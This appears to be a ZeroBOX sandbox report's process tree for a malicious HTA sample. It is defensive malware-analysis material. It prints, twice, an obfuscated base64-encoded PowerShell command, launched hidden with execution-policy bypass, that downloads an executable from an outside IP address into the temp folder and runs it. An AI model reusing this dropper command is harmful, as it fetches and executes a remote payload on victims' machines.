popup
| ZeroBOX
  1. Home
  2. Result
  3. Report
  4. Detail Analysis

Behavioral Analysis

Process tree

  • iexplore.exe "C:\Program Files\Internet Explorer\iexplore.exe" C:\Users\test22\AppData\Local\Temp\IE_NET.hta.html

    3064

    • iexplore.exe "C:\Program Files\Internet Explorer\iexplore.exe" SCODEF:3064 CREDAT:145409

      1776

      • poWErSHell.eXe "C:\Windows\SYStEM32\WINdOwSpOweRShELL\v1.0\poWErSHell.eXe" "pOWerSHELl -Ex byPAss -NOP -W 1 -EC IAAJACAACQAJAAkACQAgACAAIAAgAAkAIABbAE4ARQBUAC4AcwBFAHIAdgBJAEMAZQBQAG8ASQBOAFQATQBhAG4AQQBHAGUAcgBdADoAOgBzAGUAQwBVAFIASQB0AHkAcAByAG8AVABPAEMATwBMACAACQAgACAACQAgACAAIAAgACAACQAgAAkAPQAgACAACQAJACAACQAJAAkAIAAgACAAWwBuAEUAVAAuAHMAZQBDAFUAUgBJAFQAeQBwAHIATwB0AG8AYwBvAEwAdABZAHAAZQBdADoAOgBUAGwAcwAxADIAIAAgACAAIAAgAAkAIAAJACAAOwAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAACQAgACAAIAAJAFcARwBFAFQAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAoAFsAYwBoAGEAcgBdACAAIAAgACAAIAAgACAAMQAwADQAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACsAIAAgACAAIAAgACAAIABbAEMASABBAHIAXQAgACAAIAAgACAAIAAgADEAMQA2ACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAArACAAIAAgACAAIAAgACAAWwBDAEgAYQBSAF0AIAAgACAAIAAgACAAIAAxADEANgAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAKwAgACAAIAAgACAAIAAgAFsAYwBoAEEAcgBdACAAIAAgACAAIAAgACAAMQAxADIAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACsAIAAgACAAIAAgACAAIABbAGMAaABhAFIAXQAgACAAIAAgACAAIAAgADUAOAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAKwAgACAAIAAgACAAIAAgAFsAQwBoAGEAcgBdACAAIAAgACAAIAAgACAANAA3ACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAArACAAIAAgACAAIAAgACAAWwBDAEgAYQByAF0AIAAgACAAIAAgACAAIAA0ADcAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACsAIAAgACAAIAAgACAAIABbAEMASABBAHIAXQAgACAAIAAgACAAIAAgADQAOQAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAKwAgACAAIAAgACAAIAAgAFsAYwBIAEEAUgBdACAAIAAgACAAIAAgACAANQA3ACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAArACAAIAAgACAAIAAgACAAWwBDAGgAYQBSAF0AIAAgACAAIAAgACAAIAA1ADAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACsAIAAgACAAIAAgACAAIABbAEMASABBAHIAXQAgACAAIAAgACAAIAAgADQANgAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAKwAgACAAIAAgACAAIAAgAFsAYwBIAEEAUgBdACAAIAAgACAAIAAgACAANQAxACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAArACAAIAAgACAAIAAgACAAWwBjAEgAQQByAF0AIAAgACAAIAAgACAAIAA0ADYAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACsAIAAgACAAIAAgACAAIABbAEMASABBAFIAXQAgACAAIAAgACAAIAAgADUAMAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAKwAgACAAIAAgACAAIAAgAFsAQwBoAEEAcgBdACAAIAAgACAAIAAgACAANQAyACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAArACAAIAAgACAAIAAgACAAWwBjAGgAQQByAF0AIAAgACAAIAAgACAAIAA1ADEAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACsAIAAgACAAIAAgACAAIABbAGMAaABhAFIAXQAgACAAIAAgACAAIAAgADQANgAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAKwAgACAAIAAgACAAIAAgAFsAQwBoAEEAUgBdACAAIAAgACAAIAAgACAANAA5ACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAArACAAIAAgACAAIAAgACAAWwBDAGgAYQByAF0AIAAgACAAIAAgACAAIAA1ADIAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACsAIAAgACAAIAAgACAAIABbAGMAaABBAFIAXQAgACAAIAAgACAAIAAgADUANgAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAKwAgACAAIAAgACAAIAAgAFsAYwBoAGEAcgBdACAAIAAgACAAIAAgACAANAA3ACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAArACAAIAAgACAAIAAgACAAWwBDAGgAQQBSAF0AIAAgACAAIAAgACAAIAA1ADIAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACsAIAAgACAAIAAgACAAIABbAGMASABhAFIAXQAgACAAIAAgACAAIAAgADUAMwAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAKwAgACAAIAAgACAAIAAgAFsAYwBIAGEAUgBdACAAIAAgACAAIAAgACAANAA4ACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAArACAAIAAgACAAIAAgACAAWwBjAGgAYQBSAF0AIAAgACAAIAAgACAAIAA0ADcAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACsAIAAgACAAIAAgACAAIABbAEMASABhAHIAXQAgACAAIAAgACAAIAAgADEAMQA5ACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAArACAAIAAgACAAIAAgACAAWwBDAEgAQQByAF0AIAAgACAAIAAgACAAIAAxADAANQAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAKwAgACAAIAAgACAAIAAgAFsAYwBoAGEAcgBdACAAIAAgACAAIAAgACAAMQAxADAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACsAIAAgACAAIAAgACAAIABbAGMASABBAFIAXQAgACAAIAAgACAAIAAgADQANgAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAKwAgACAAIAAgACAAIAAgAFsAQwBoAEEAcgBdACAAIAAgACAAIAAgACAAMQAwADEAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACsAIAAgACAAIAAgACAAIABbAGMAaABBAFIAXQAgACAAIAAgACAAIAAgADEAMgAwACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAArACAAIAAgACAAIAAgACAAWwBjAGgAQQBSAF0AIAAgACAAIAAgACAAIAAxADAAMQAgACAAIAAgACAAIAAgACkAIAAJAC0AbwBVAHQARgBJAGwARQAgAAkACQAJAAkACQAdICQARQBOAHYAOgB0AEUATQBQAFwASQBCAE0AXwBDAGUAbgB0AG8AcwAuAGUAeABlAB0gIAAgACAAIAAgACAAIAAgACAAOwAgAAkAIAAJACAAIAAJAFMAdABBAFIAVAAgACAAIAAgACAAHSAkAEUATgBWADoAVABFAE0AUABcAEkAQgBNAF8AQwBlAG4AdABvAHMALgBlAHgAZQAdIA== "

        1720

        • powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -Ex byPAss -NOP -W 1 -EC IAAJACAACQAJAAkACQAgACAAIAAgAAkAIABbAE4ARQBUAC4AcwBFAHIAdgBJAEMAZQBQAG8ASQBOAFQATQBhAG4AQQBHAGUAcgBdADoAOgBzAGUAQwBVAFIASQB0AHkAcAByAG8AVABPAEMATwBMACAACQAgACAACQAgACAAIAAgACAACQAgAAkAPQAgACAACQAJACAACQAJAAkAIAAgACAAWwBuAEUAVAAuAHMAZQBDAFUAUgBJAFQAeQBwAHIATwB0AG8AYwBvAEwAdABZAHAAZQBdADoAOgBUAGwAcwAxADIAIAAgACAAIAAgAAkAIAAJACAAOwAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAACQAgACAAIAAJAFcARwBFAFQAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAoAFsAYwBoAGEAcgBdACAAIAAgACAAIAAgACAAMQAwADQAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACsAIAAgACAAIAAgACAAIABbAEMASABBAHIAXQAgACAAIAAgACAAIAAgADEAMQA2ACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAArACAAIAAgACAAIAAgACAAWwBDAEgAYQBSAF0AIAAgACAAIAAgACAAIAAxADEANgAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAKwAgACAAIAAgACAAIAAgAFsAYwBoAEEAcgBdACAAIAAgACAAIAAgACAAMQAxADIAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACsAIAAgACAAIAAgACAAIABbAGMAaABhAFIAXQAgACAAIAAgACAAIAAgADUAOAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAKwAgACAAIAAgACAAIAAgAFsAQwBoAGEAcgBdACAAIAAgACAAIAAgACAANAA3ACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAArACAAIAAgACAAIAAgACAAWwBDAEgAYQByAF0AIAAgACAAIAAgACAAIAA0ADcAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACsAIAAgACAAIAAgACAAIABbAEMASABBAHIAXQAgACAAIAAgACAAIAAgADQAOQAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAKwAgACAAIAAgACAAIAAgAFsAYwBIAEEAUgBdACAAIAAgACAAIAAgACAANQA3ACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAArACAAIAAgACAAIAAgACAAWwBDAGgAYQBSAF0AIAAgACAAIAAgACAAIAA1ADAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACsAIAAgACAAIAAgACAAIABbAEMASABBAHIAXQAgACAAIAAgACAAIAAgADQANgAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAKwAgACAAIAAgACAAIAAgAFsAYwBIAEEAUgBdACAAIAAgACAAIAAgACAANQAxACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAArACAAIAAgACAAIAAgACAAWwBjAEgAQQByAF0AIAAgACAAIAAgACAAIAA0ADYAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACsAIAAgACAAIAAgACAAIABbAEMASABBAFIAXQAgACAAIAAgACAAIAAgADUAMAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAKwAgACAAIAAgACAAIAAgAFsAQwBoAEEAcgBdACAAIAAgACAAIAAgACAANQAyACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAArACAAIAAgACAAIAAgACAAWwBjAGgAQQByAF0AIAAgACAAIAAgACAAIAA1ADEAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACsAIAAgACAAIAAgACAAIABbAGMAaABhAFIAXQAgACAAIAAgACAAIAAgADQANgAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAKwAgACAAIAAgACAAIAAgAFsAQwBoAEEAUgBdACAAIAAgACAAIAAgACAANAA5ACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAArACAAIAAgACAAIAAgACAAWwBDAGgAYQByAF0AIAAgACAAIAAgACAAIAA1ADIAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACsAIAAgACAAIAAgACAAIABbAGMAaABBAFIAXQAgACAAIAAgACAAIAAgADUANgAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAKwAgACAAIAAgACAAIAAgAFsAYwBoAGEAcgBdACAAIAAgACAAIAAgACAANAA3ACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAArACAAIAAgACAAIAAgACAAWwBDAGgAQQBSAF0AIAAgACAAIAAgACAAIAA1ADIAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACsAIAAgACAAIAAgACAAIABbAGMASABhAFIAXQAgACAAIAAgACAAIAAgADUAMwAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAKwAgACAAIAAgACAAIAAgAFsAYwBIAGEAUgBdACAAIAAgACAAIAAgACAANAA4ACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAArACAAIAAgACAAIAAgACAAWwBjAGgAYQBSAF0AIAAgACAAIAAgACAAIAA0ADcAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACsAIAAgACAAIAAgACAAIABbAEMASABhAHIAXQAgACAAIAAgACAAIAAgADEAMQA5ACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAArACAAIAAgACAAIAAgACAAWwBDAEgAQQByAF0AIAAgACAAIAAgACAAIAAxADAANQAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAKwAgACAAIAAgACAAIAAgAFsAYwBoAGEAcgBdACAAIAAgACAAIAAgACAAMQAxADAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACsAIAAgACAAIAAgACAAIABbAGMASABBAFIAXQAgACAAIAAgACAAIAAgADQANgAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAKwAgACAAIAAgACAAIAAgAFsAQwBoAEEAcgBdACAAIAAgACAAIAAgACAAMQAwADEAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACsAIAAgACAAIAAgACAAIABbAGMAaABBAFIAXQAgACAAIAAgACAAIAAgADEAMgAwACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAArACAAIAAgACAAIAAgACAAWwBjAGgAQQBSAF0AIAAgACAAIAAgACAAIAAxADAAMQAgACAAIAAgACAAIAAgACkAIAAJAC0AbwBVAHQARgBJAGwARQAgAAkACQAJAAkACQAdICQARQBOAHYAOgB0AEUATQBQAFwASQBCAE0AXwBDAGUAbgB0AG8AcwAuAGUAeABlAB0gIAAgACAAIAAgACAAIAAgACAAOwAgAAkAIAAJACAAIAAJAFMAdABBAFIAVAAgACAAIAAgACAAHSAkAEUATgBWADoAVABFAE0AUABcAEkAQgBNAF8AQwBlAG4AdABvAHMALgBlAHgAZQAdIA==

          2968

Process contents

No process loaded Click on a process in the tree above to load its data.

PID
Parent PID
default registry file network process services synchronisation iexplore office pdf